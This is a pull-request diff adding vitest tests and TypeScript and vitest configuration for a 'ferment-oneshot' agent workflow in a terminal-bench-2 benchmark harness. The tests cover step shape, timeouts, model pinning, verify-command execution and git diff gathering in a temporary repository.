+		const run = await createTestRun(fermentOneshot, {
+			input: roomyInput(),
+			steps: { ...noGit, verify: verifyOk },
+			agents: {
+				plan: [reply(onePhaseOneStep)],
+				"step-turn": [reply(stepPass)],
+				"phase-gates": [reply(phasePass)],
+				"phase-grade": [reply(gradeA)],
+				ship: [reply(shipPass)],
+			},
+		})
+
+		expect(run.status).toBe("completed")
+		// The whole step: one turn. It used to be two (a worker, then a gate turn), and a refusal used to
+		// buy another of each.
+		expect(run.agent("step-turn").sessions).toBe(1)
+		expect(run.agent("step-turn").remaining).toBe(0)
+	})
+})
+
+describe("ferment-oneshot: the shape", () => {
+	it("runs every agent step as an isolated subagent that may fail without ending the run", () => {
+		const steps = agentSteps()
+		const names = [
+			"plan",
+			"judge",
+			"refine-steps",
+			"step-turn",
+			"verify-judge",
+			"phase-gates",
+			"phase-grade",
+			"phase-rework",
+			"ship",
+		]
+
+		expect([...steps.keys()].sort()).toEqual([...names].sort())
+		for (const name of names) {
+			expect(steps.get(name)?.background, name).toBe(true)
+			// Optional throughout: a stage that fails must cost that stage, not the run — the run has to
+			// reach `report` with whatever landed, because the container is graded either way.
+			expect(steps.get(name)?.optional, name).toBe(true)
+		}
+	})
+
+	it("puts kimchi's orchestrator turns in one session, and leaves every independent judge cold", () => {
+		const steps = agentSteps()
+
+		// kimchi owns its gates by TURN, and scope_ferment, the step (start → work → complete),
+		// complete_ferment_phase and complete_ferment are all turns of the ONE session that wrote the plan
+		// (gate-registry.ts's header; tools/steps.ts:146). Sharing a resume key is how that is said here, and
+		// it is what makes the registry's second person true: C1 walks a checklist "declared at scope time"
+		// because this session declared it, and S1 asks about "your own summary" because this session did
+		// the work.
+		for (const name of ["plan", "step-turn", "phase-gates", "ship"]) {
+			expect(steps.get(name)?.resumable, name).toBe("orchestrator")
+		}
+
+		// The judges stay cold, and this is not the same argument that lost for the step gates. kimchi
+		// really does spawn these as separate opinions (judgeStepVerification, judgePhaseGradeViaSubagent),
+		// so fresh eyes here is fidelity, not scepticism-by-default. The phase rework is a dispatched agent
+		// in kimchi too.
+		for (const name of ["judge", "verify-judge", "phase-grade", "phase-rework", "refine-steps"]) {
+			expect(steps.get(name)?.resumable, name).toBeUndefined()
+		}
+	})
+
+	it("puts no wall clock on the step turn, or on anything but the phase rework", () => {
+		// kimchi bounds a step turn with NOTHING but the run's deadline: the work and the completion are
+		// tool calls inside a session its harness owns. There is no second process to box once the
+		// orchestrator does the work, so the worker's tier box and the 180s gate box are both gone — and a
+		// step turn that runs away now spends the RUN's clock, which is the same exposure kimchi has.
+		expect(agentSteps().get("step-turn")?.maxDurationMs).toBeUndefined()
+
+		// The one constant left, on the one turn still handed to an agent of its own: kimchi's `standard`
+		// tier, never a share of anything.
+		expect(agentSteps().get("phase-rework")?.maxDurationMs).toBe(300_000)
+
+		for (const [name, step] of agentSteps()) {
+			if (name === "phase-rework") continue
+			expect(step.maxDurationMs, name).toBeUndefined()
+		}
+	})
+
+	it("pins no model anywhere, so every step falls through to the session's own default", () => {
+		// The workflow used to declare `defaultModel: process.env.TB_MODEL ?? "kimchi-dev/kimi-k2.7"`,
+		// which meant the value was never undefined and every step permanently ran a hardcoded model
+		// instead of whichever one this benchmark run actually selected. It was removed on the move here
+		// (see the workflow's own header, "Deliberately no `defaultModel` here") so per-step model
+		// resolution — step `model` → workflow `defaultModel` → the harness/session default — falls all
+		// the way through to whatever `--model` the benchmark launched kimchi with. A pin at EITHER level
+		// would silently override that selection again and make model comparisons meaningless, so both
+		// halves of "nothing is pinned" are worth asserting, not just the workflow-level default.
+		expect(fermentOneshot.defaultModel).toBeUndefined()
+		for (const [name, step] of agentSteps()) {
+			expect(step.model, name).toBeUndefined()
+		}
+	})
+})
+
+/**
+ * The one piece with real I/O, which every test above stubs: the step's verify command actually runs,
+ * and what it produces is what the gates and the triage judge are shown.
+ */
+describe("ferment-oneshot: running a verify command", () => {
+	it("captures the exit code and both streams", async () => {
+		const result = await runVerification("printf ok; printf boom >&2; exit 3", new AbortController().signal)
+
+		expect(result).toMatchObject({ ran: true, exitCode: 3, stdout: "ok", stderr: "boom" })
+	})
+
+	it("reports a command that could not run at all as a failure", async () => {
+		const result = await runVerification("definitely-not-a-real-binary", new AbortController().signal)
+
+		expect(result.ran).toBe(true)
+		expect(result.exitCode).not.toBe(0)
+	})
+
+	it("kills the command when the run is cancelled, rather than holding the step open", async () => {
+		const controller = new AbortController()
+		const running = runVerification("sleep 30", controller.signal)
+		controller.abort()
+
+		const result = await running
+		expect(result.exitCode).toBe(1)
+		expect(result.stderr).toContain("cancelled")
+	})
+})
+
+/**
+ * The other piece with real I/O, and the one the phase grade rests on: what `git` is asked, and what
+ * comes back. Run against a throwaway repo rather than stubbed, because the failure that matters here —
+ * a diff that omits files the phase CREATED — is invisible to a stub.
+ */
+describe("ferment-oneshot: gathering the diff evidence", () => {
+	const signal = new AbortController().signal
+	const originalCwd = process.cwd()
+	let repo = ""
+
+	const git = (...args: string[]): void => {
+		execFileSync(
+			"git",
+			["-c", "commit.gpgsign=false", "-c", "user.email=t@example.com", "-c", "user.name=t", ...args],
+			{ cwd: repo, stdio: "ignore" },
+		)
+	}
+
+	beforeEach(() => {
+		repo = mkdtempSync(join(tmpdir(), "ferment-diff-"))
+		git("init", "-q")
+		writeFileSync(join(repo, "main.py"), "print('bad')\n")
+		git("add", "-A")
+		git("commit", "-qm", "base")
+		process.chdir(repo)
+	})
+
+	afterEach(() => {
+		process.chdir(originalCwd)
+		rmSync(repo, { recursive: true, force: true })
+	})
+
+	it("shows edits AND files the phase created, because a new file is not an empty diff", async () => {
+		const ref = await currentGitRef(signal)
+		writeFileSync(join(repo, "main.py"), "print('ok')\n")
+		writeFileSync(join(repo, "helper.py"), "def helper():\n    return 1\n")
+
+		const diff = await phaseDiffSince(ref, signal)
+
+		expect(diff.available).toBe(true)
+		expect(diff.filesChanged).toContain("main.py")
+		expect(diff.diffSnippet).toContain("+print('ok')")
+		// kimchi lists untracked files with the `?? ` prefix and synthesises a diff against /dev/null for
+		// each. Without that, a phase whose whole job was to write new files reads to the grader — and to
+		// F2's "cite the specific artifact" — as a phase that changed nothing.
+		expect(diff.filesChanged).toContain("?? helper.py")
+		expect(diff.diffSnippet).toContain("+def helper():")
+		expect(diff.elidedBytes).toBe(0)
+	})
+
+	it("keeps the head and the tail when it truncates, and says how much it dropped", async () => {
+		const ref = await currentGitRef(signal)
+		const body = Array.from({ length: 4000 }, (_, line) => `filler line ${line}`).join("\n")
+		writeFileSync(join(repo, "big.py"), `HEAD_SENTINEL\n${body}\nTAIL_SENTINEL\n`)
+
+		const diff = await phaseDiffSince(ref, signal)
+
+		expect(diff.elidedBytes).toBeGreaterThan(0)
+		expect(diff.diffSnippet).toContain("HEAD_SENTINEL")
+		expect(diff.diffSnippet).toContain("TAIL_SENTINEL")
+		expect(diff.diffSnippet).toContain(`diff truncated, ${diff.elidedBytes} bytes elided`)
+	})
+
+	it("reports no evidence rather than a wrong one outside a git repo", async () => {
+		const bare = mkdtempSync(join(tmpdir(), "ferment-nogit-"))
+		try {
+			process.chdir(bare)
+			expect(await currentGitRef(signal)).toBe("")
+			// Which is what the grader prompt turns into "no diff available — inspect files directly".
+			expect(await phaseDiffSince("", signal)).toMatchObject({ available: false, diffSnippet: "", elidedBytes: 0 })
+		} finally {
+			process.chdir(repo)
+			rmSync(bare, { recursive: true, force: true })
+		}
+	})
+})

--- a/benchmark/terminal-bench-2/workflows/tsconfig.json
+++ b/benchmark/terminal-bench-2/workflows/tsconfig.json
@@ -1,0 +1,22 @@
+{
+	"//": "Mirrors kimchi-workflows/tsconfig.json's compiler options so a workflow is checked under the same rules the engine itself is written against. `noEmit` — this never produces output; the container loads workflow files straight through jiti (see README.md).",
+	"compilerOptions": {
+		"target": "ES2023",
+		"lib": ["ES2023"],
+		"module": "ESNext",
+		"moduleResolution": "Bundler",
+		"moduleDetection": "force",
+		"allowImportingTsExtensions": true,
+		"verbatimModuleSyntax": true,
+		"strict": true,
+		"noUncheckedIndexedAccess": true,
+		"noImplicitOverride": true,
+		"noEmit": true,
+		"esModuleInterop": true,
+		"forceConsistentCasingInFileNames": true,
+		"skipLibCheck": true,
+		"types": ["node"]
+	},
+	"include": ["**/*.ts"],
+	"exclude": ["node_modules"]
+}

--- a/benchmark/terminal-bench-2/workflows/vitest.config.ts
+++ b/benchmark/terminal-bench-2/workflows/vitest.config.ts
@@ -1,0 +1,15 @@
+import { defineConfig } from "vitest/config"
+
+/**
+ * Mirrors kimchi-workflows/vitest.config.ts, minimal: this directory tests workflow DEFINITIONS, not
+ * an engine, so there is no integration-test split here. `exclude` matters more than usual — `npm
+ * install` symlinks `node_modules/@kimchi-dev/kimchi-workflows` straight at the sibling checkout (see
+ * README.md), and that checkout has its own `test/**` tree; without excluding node_modules, a bare glob
+ * could wander into it and run the engine's suite as if it were this package's own.
+ */
+export default defineConfig({
+	test: {
+		include: ["test/**/*.test.ts"],
+		exclude: ["**/node_modules/**"],
+	},
+})


### PR DESCRIPTION
## Linked issue

Closes #0

<!-- Every PR must link to an existing issue. PRs without a linked issue will not be reviewed.
     Use one of: Closes #N / Fixes #N / Resolves #N -->

## What does this PR do?

Adds a WorkflowAgent to the terminal-bench-2 harness that runs a named workflow via the kimchi-workflows extension instead of kimchi's default chat loop. This allows benchmarking different workflow implementations against stock kimchi under identical conditions.

Ferment-oneshot workflow (workflows/ferment-oneshot.workflow.ts)
 
## Checklist

- [x] I have read [CONTRIBUTING.md](../CONTRIBUTING.md) and agree to the CLA
- [x] This PR links to an open issue above
- [x] Tests pass locally (`pnpm run test`)
- [x] Lint passes (`pnpm run check`)
- [x] Documentation updated if behavior changed
